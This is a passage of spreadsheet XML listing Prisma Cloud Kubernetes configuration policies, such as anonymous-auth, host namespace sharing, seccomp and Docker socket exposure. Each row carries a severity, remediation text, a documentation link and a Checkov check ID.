      <c r="E1116" t="inlineStr"/>
      <c r="F1116" t="inlineStr"/>
      <c r="G1116" t="b">
        <v>1</v>
      </c>
      <c r="H11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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1116" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod</t>
        </is>
      </c>
      <c r="K1116" t="inlineStr">
        <is>
          <t>The --peer-client-cert-auth argument is not set to True</t>
        </is>
      </c>
      <c r="L1116" t="inlineStr"/>
      <c r="M1116" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1116" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1116" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1116" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1116" t="inlineStr"/>
      <c r="R1116" t="inlineStr"/>
      <c r="S1116" t="inlineStr"/>
      <c r="T1116" t="b">
        <v>0</v>
      </c>
      <c r="U1116" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1116" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod</t>
        </is>
      </c>
      <c r="W1116" t="inlineStr">
        <is>
          <t>Ensure that the --peer-client-cert-auth argument is set to true</t>
        </is>
      </c>
      <c r="X1116" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-peer-client-cert-auth-argument-is-set-to-true</t>
        </is>
      </c>
      <c r="Y1116" t="inlineStr"/>
      <c r="Z1116" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Pod"]}</t>
        </is>
      </c>
      <c r="AA1116" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1116" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1116" t="inlineStr">
        <is>
          <t>CKV_K8S_121</t>
        </is>
      </c>
      <c r="AD1116" t="b">
        <v>1</v>
      </c>
      <c r="AE1116" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1116" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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6" t="inlineStr">
        <is>
          <t>469a0145-d6dd-4e83-8904-02de65a8b94f</t>
        </is>
      </c>
      <c r="AI1116" t="inlineStr"/>
      <c r="AJ1116" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1116" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1117">
      <c r="A1117" t="inlineStr"/>
      <c r="B1117" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1117" s="2" t="inlineStr"/>
      <c r="D1117" t="inlineStr"/>
      <c r="E1117" t="inlineStr"/>
      <c r="F1117" t="inlineStr"/>
      <c r="G1117" t="b">
        <v>1</v>
      </c>
      <c r="H11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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1117" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod</t>
        </is>
      </c>
      <c r="K1117" t="inlineStr">
        <is>
          <t>The --anonymous-auth argument is not set to False for Kubelet</t>
        </is>
      </c>
      <c r="L1117" t="inlineStr"/>
      <c r="M1117" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1117" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1117" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1117" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1117" t="inlineStr"/>
      <c r="R1117" t="inlineStr"/>
      <c r="S1117" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T1117" t="b">
        <v>0</v>
      </c>
      <c r="U1117" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1117" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod</t>
        </is>
      </c>
      <c r="W1117" t="inlineStr">
        <is>
          <t>Ensure that the --anonymous-auth argument is set to false</t>
        </is>
      </c>
      <c r="X1117" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-anonymous-auth-argument-is-set-to-false</t>
        </is>
      </c>
      <c r="Y1117" t="inlineStr"/>
      <c r="Z1117" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Pod"]}</t>
        </is>
      </c>
      <c r="AA1117" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1117" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1117" t="inlineStr">
        <is>
          <t>CKV_K8S_138</t>
        </is>
      </c>
      <c r="AD1117" t="b">
        <v>1</v>
      </c>
      <c r="AE1117" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1117" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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7" t="inlineStr">
        <is>
          <t>6ae55812-7a47-4582-9b3d-45f7ed0d22bd</t>
        </is>
      </c>
      <c r="AI1117" t="inlineStr"/>
      <c r="AJ1117" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1117" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1118">
      <c r="A1118" t="inlineStr"/>
      <c r="B1118" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1118" s="2" t="inlineStr"/>
      <c r="D1118" t="inlineStr"/>
      <c r="E1118" t="inlineStr"/>
      <c r="F1118" t="inlineStr"/>
      <c r="G1118" t="b">
        <v>1</v>
      </c>
      <c r="H11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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1118" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod</t>
        </is>
      </c>
      <c r="K1118" t="inlineStr">
        <is>
          <t>The --authorization-mode argument is set to AlwaysAllow for API server</t>
        </is>
      </c>
      <c r="L1118" t="inlineStr"/>
      <c r="M1118" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1118" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1118" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1118" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1118" t="inlineStr"/>
      <c r="R1118" t="inlineStr"/>
      <c r="S1118" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T1118" t="b">
        <v>0</v>
      </c>
      <c r="U1118" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1118" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod</t>
        </is>
      </c>
      <c r="W1118" t="inlineStr">
        <is>
          <t>Ensure that the --authorization-mode argument is not set to AlwaysAllow</t>
        </is>
      </c>
      <c r="X1118" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow</t>
        </is>
      </c>
      <c r="Y1118" t="inlineStr"/>
      <c r="Z1118" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Pod"]}</t>
        </is>
      </c>
      <c r="AA1118" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1118" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1118" t="inlineStr">
        <is>
          <t>CKV_K8S_139</t>
        </is>
      </c>
      <c r="AD1118" t="b">
        <v>1</v>
      </c>
      <c r="AE1118" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1118" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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8" t="inlineStr">
        <is>
          <t>7e6128ec-aab4-4985-8212-a76202f2a3f0</t>
        </is>
      </c>
      <c r="AI1118" t="inlineStr"/>
      <c r="AJ1118" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1118" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1119">
      <c r="A1119" t="inlineStr"/>
      <c r="B1119" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1119" s="2" t="inlineStr"/>
      <c r="D1119" t="inlineStr"/>
      <c r="E1119" t="inlineStr"/>
      <c r="F1119" t="inlineStr"/>
      <c r="G1119" t="b">
        <v>1</v>
      </c>
      <c r="H11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19" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1119" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="K1119" t="inlineStr">
        <is>
          <t>Containers share the host network namespace</t>
        </is>
      </c>
      <c r="L1119" t="inlineStr"/>
      <c r="M1119" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1119" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1119" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1119" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1119" t="inlineStr"/>
      <c r="R1119" t="inlineStr"/>
      <c r="S1119" t="inlineStr"/>
      <c r="T1119" t="b">
        <v>0</v>
      </c>
      <c r="U1119" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1119" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="W1119" t="inlineStr">
        <is>
          <t>Containers should not share the host network namespace</t>
        </is>
      </c>
      <c r="X1119" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-18</t>
        </is>
      </c>
      <c r="Y1119" t="inlineStr"/>
      <c r="Z1119" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Pod","Deployment","DaemonSet","StatefulSet","ReplicaSet","ReplicationController","Job","CronJob"]}</t>
        </is>
      </c>
      <c r="AA1119" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1119" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1119" t="inlineStr">
        <is>
          <t>CKV_K8S_19</t>
        </is>
      </c>
      <c r="AD1119" t="b">
        <v>1</v>
      </c>
      <c r="AE1119" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1119" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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19" t="inlineStr">
        <is>
          <t>d75d1d2a-a62b-4a6c-bd89-5020f10caafd</t>
        </is>
      </c>
      <c r="AI1119" t="inlineStr"/>
      <c r="AJ1119" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1119" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1120">
      <c r="A1120" t="inlineStr"/>
      <c r="B1120" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1120" s="2" t="inlineStr"/>
      <c r="D1120" t="inlineStr"/>
      <c r="E1120" t="inlineStr"/>
      <c r="F1120" t="inlineStr"/>
      <c r="G1120" t="b">
        <v>1</v>
      </c>
      <c r="H11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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1120" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="K1120" t="inlineStr">
        <is>
          <t>Containers share host IPC namespace</t>
        </is>
      </c>
      <c r="L1120" t="inlineStr"/>
      <c r="M1120" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1120" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1120" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1120" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1120" t="inlineStr"/>
      <c r="R1120" t="inlineStr"/>
      <c r="S1120" t="inlineStr"/>
      <c r="T1120" t="b">
        <v>0</v>
      </c>
      <c r="U1120" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1120" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="W1120" t="inlineStr">
        <is>
          <t>Containers should not share the host IPC namespace</t>
        </is>
      </c>
      <c r="X1120" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-17</t>
        </is>
      </c>
      <c r="Y1120" t="inlineStr"/>
      <c r="Z1120" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Pod","Deployment","DaemonSet","StatefulSet","ReplicaSet","ReplicationController","Job","CronJob"]}</t>
        </is>
      </c>
      <c r="AA1120" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1120" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1120" t="inlineStr">
        <is>
          <t>CKV_K8S_18</t>
        </is>
      </c>
      <c r="AD1120" t="b">
        <v>1</v>
      </c>
      <c r="AE1120" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1120" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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0" t="inlineStr">
        <is>
          <t>10cf6234-c41e-409f-bbcb-536327f091b9</t>
        </is>
      </c>
      <c r="AI1120" t="inlineStr"/>
      <c r="AJ1120" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1120" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1121">
      <c r="A1121" t="inlineStr"/>
      <c r="B1121" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1121" s="2" t="inlineStr"/>
      <c r="D1121" t="inlineStr"/>
      <c r="E1121" t="inlineStr"/>
      <c r="F1121" t="inlineStr"/>
      <c r="G1121" t="b">
        <v>1</v>
      </c>
      <c r="H11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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1121" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="K1121" t="inlineStr">
        <is>
          <t>Service account tokens are not mounted where necessary</t>
        </is>
      </c>
      <c r="L1121" t="inlineStr"/>
      <c r="M1121" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1121" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1121" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1121" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1121" t="inlineStr"/>
      <c r="R1121" t="inlineStr"/>
      <c r="S1121" t="inlineStr"/>
      <c r="T1121" t="b">
        <v>0</v>
      </c>
      <c r="U1121" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1121" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="W1121" t="inlineStr">
        <is>
          <t>Ensure that Service Account Tokens are only mounted where necessary</t>
        </is>
      </c>
      <c r="X1121" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-35</t>
        </is>
      </c>
      <c r="Y1121" t="inlineStr"/>
      <c r="Z1121" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Pod","Deployment","DaemonSet","StatefulSet","ReplicaSet","ReplicationController","Job","CronJob"]}</t>
        </is>
      </c>
      <c r="AA1121" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1121" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1121" t="inlineStr">
        <is>
          <t>CKV_K8S_38</t>
        </is>
      </c>
      <c r="AD1121" t="b">
        <v>1</v>
      </c>
      <c r="AE1121" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1121" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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1" t="inlineStr">
        <is>
          <t>c086fb0e-c3eb-47ad-9d70-32e62fd3f467</t>
        </is>
      </c>
      <c r="AI1121" t="inlineStr"/>
      <c r="AJ1121" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1121" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1122">
      <c r="A1122" t="inlineStr"/>
      <c r="B1122" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1122" s="2" t="inlineStr"/>
      <c r="D1122" t="inlineStr"/>
      <c r="E1122" t="inlineStr"/>
      <c r="F1122" t="inlineStr"/>
      <c r="G1122" t="b">
        <v>1</v>
      </c>
      <c r="H11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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1122" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="K1122" t="inlineStr">
        <is>
          <t>securityContext is not applied to pods and containers</t>
        </is>
      </c>
      <c r="L1122" t="inlineStr"/>
      <c r="M1122" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1122" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1122" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1122" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1122" t="inlineStr"/>
      <c r="R1122" t="inlineStr"/>
      <c r="S1122" t="inlineStr">
        <is>
          <t>Policy Status Review</t>
        </is>
      </c>
      <c r="T1122" t="b">
        <v>0</v>
      </c>
      <c r="U1122" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1122" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="W1122" t="inlineStr">
        <is>
          <t>Apply security context to your pods and containers</t>
        </is>
      </c>
      <c r="X1122" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-securitycontext-is-applied-to-pods-and-containers</t>
        </is>
      </c>
      <c r="Y1122" t="inlineStr"/>
      <c r="Z1122" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Pod","Deployment","DaemonSet","StatefulSet","ReplicaSet","ReplicationController","Job","CronJob"]}</t>
        </is>
      </c>
      <c r="AA1122" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1122" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1122" t="inlineStr">
        <is>
          <t>CKV_K8S_29</t>
        </is>
      </c>
      <c r="AD1122" t="b">
        <v>1</v>
      </c>
      <c r="AE1122" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1122" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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2" t="inlineStr">
        <is>
          <t>9cc81c69-dc64-48fc-ad1f-d9c07ff85051</t>
        </is>
      </c>
      <c r="AI1122" t="inlineStr"/>
      <c r="AJ1122" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1122" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1123">
      <c r="A1123" t="inlineStr"/>
      <c r="B1123" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1123" s="2" t="inlineStr"/>
      <c r="D1123" t="inlineStr"/>
      <c r="E1123" t="inlineStr"/>
      <c r="F1123" t="inlineStr"/>
      <c r="G1123" t="b">
        <v>1</v>
      </c>
      <c r="H11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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1123" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="K1123" t="inlineStr">
        <is>
          <t>seccomp is not set to Docker/Default or Runtime/Default</t>
        </is>
      </c>
      <c r="L1123" t="inlineStr"/>
      <c r="M1123" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1123" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1123" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1123" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1123" t="inlineStr"/>
      <c r="R1123" t="inlineStr"/>
      <c r="S1123" t="inlineStr"/>
      <c r="T1123" t="b">
        <v>0</v>
      </c>
      <c r="U1123" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1123" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="W1123" t="inlineStr">
        <is>
          <t>Ensure that the seccomp profile is set to docker/default or runtime/default</t>
        </is>
      </c>
      <c r="X1123" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-29</t>
        </is>
      </c>
      <c r="Y1123" t="inlineStr"/>
      <c r="Z1123" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Pod","Deployment","DaemonSet","StatefulSet","ReplicaSet","ReplicationController","Job","CronJob"]}</t>
        </is>
      </c>
      <c r="AA1123" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1123" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1123" t="inlineStr">
        <is>
          <t>CKV_K8S_31</t>
        </is>
      </c>
      <c r="AD1123" t="b">
        <v>1</v>
      </c>
      <c r="AE1123" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1123" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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3" t="inlineStr">
        <is>
          <t>fd6729ef-efdb-4fff-9afa-dc005f192ea5</t>
        </is>
      </c>
      <c r="AI1123" t="inlineStr"/>
      <c r="AJ1123" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1123" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1124">
      <c r="A1124" t="inlineStr"/>
      <c r="B1124" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1124" s="2" t="inlineStr"/>
      <c r="D1124" t="inlineStr"/>
      <c r="E1124" t="inlineStr"/>
      <c r="F1124" t="inlineStr"/>
      <c r="G1124" t="b">
        <v>1</v>
      </c>
      <c r="H11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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1124" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="K1124" t="inlineStr">
        <is>
          <t>Mounting Docker socket daemon in a container is not limited</t>
        </is>
      </c>
      <c r="L1124" t="inlineStr"/>
      <c r="M1124" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1124" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1124" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1124" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1124" t="inlineStr"/>
      <c r="R1124" t="inlineStr"/>
      <c r="S1124" t="inlineStr"/>
      <c r="T1124" t="b">
        <v>0</v>
      </c>
      <c r="U1124" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1124" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="W1124" t="inlineStr">
        <is>
          <t>Do not expose the docker daemon socket to containers</t>
        </is>
      </c>
      <c r="X1124" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-26</t>
        </is>
      </c>
      <c r="Y1124" t="inlineStr"/>
      <c r="Z1124" t="inlineStr">
        <is>
          <t>{"category":"Kubernetes","resourceTypes":["Pod","Deployment","DaemonSet","StatefulSet","ReplicaSet","ReplicationController","Job","CronJob"]}</t>
        </is>
      </c>
      <c r="AA1124" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1124" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1124" t="inlineStr">
        <is>
          <t>CKV_K8S_27</t>
        </is>
      </c>
      <c r="AD1124" t="b">
        <v>1</v>
      </c>
      <c r="AE1124" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1124" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG11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4" t="inlineStr">
        <is>
          <t>649d6e38-26ce-48a1-9b60-873af3b5f3e4</t>
        </is>
      </c>
      <c r="AI1124" t="inlineStr"/>
      <c r="AJ1124" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1124" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1125">
      <c r="A1125" t="inlineStr"/>
      <c r="B1125" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1125" s="2" t="inlineStr"/>
      <c r="D1125" t="inlineStr"/>
      <c r="E1125" t="inlineStr"/>
      <c r="F1125" t="inlineStr"/>
      <c r="G1125" t="b">
        <v>1</v>
      </c>
      <c r="H11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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1125" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="K1125" t="inlineStr">
        <is>
          <t>Containers do not run with a high UID</t>
        </is>
      </c>
      <c r="L1125" t="inlineStr"/>
      <c r="M1125" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1125" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1125" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1125" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1125" t="inlineStr"/>
      <c r="R1125" t="inlineStr"/>
      <c r="S1125" t="inlineStr"/>
      <c r="T1125" t="b">
        <v>0</v>
      </c>
      <c r="U1125" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1125" t="inlineStr">
        <is>
          <t>IaC:Kubernetes:Pod,Deployment,DaemonSet,StatefulSet,ReplicaSet,ReplicationController,Job,CronJob</t>
        </is>
      </c>
      <c r="W1125" t="inlineStr">
        <is>
          <t>Containers should run as a high UID to avoid host conflict</t>
        </is>
      </c>
      <c r="X1125" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/kubernetes-policies/kubernetes-policy-index/bc-k8s-37</t>
        </is>
      </c>
      <c r="Y1125" t="inlineStr"/>
      <c r="Z1125" t="inlineStr">
        <is>
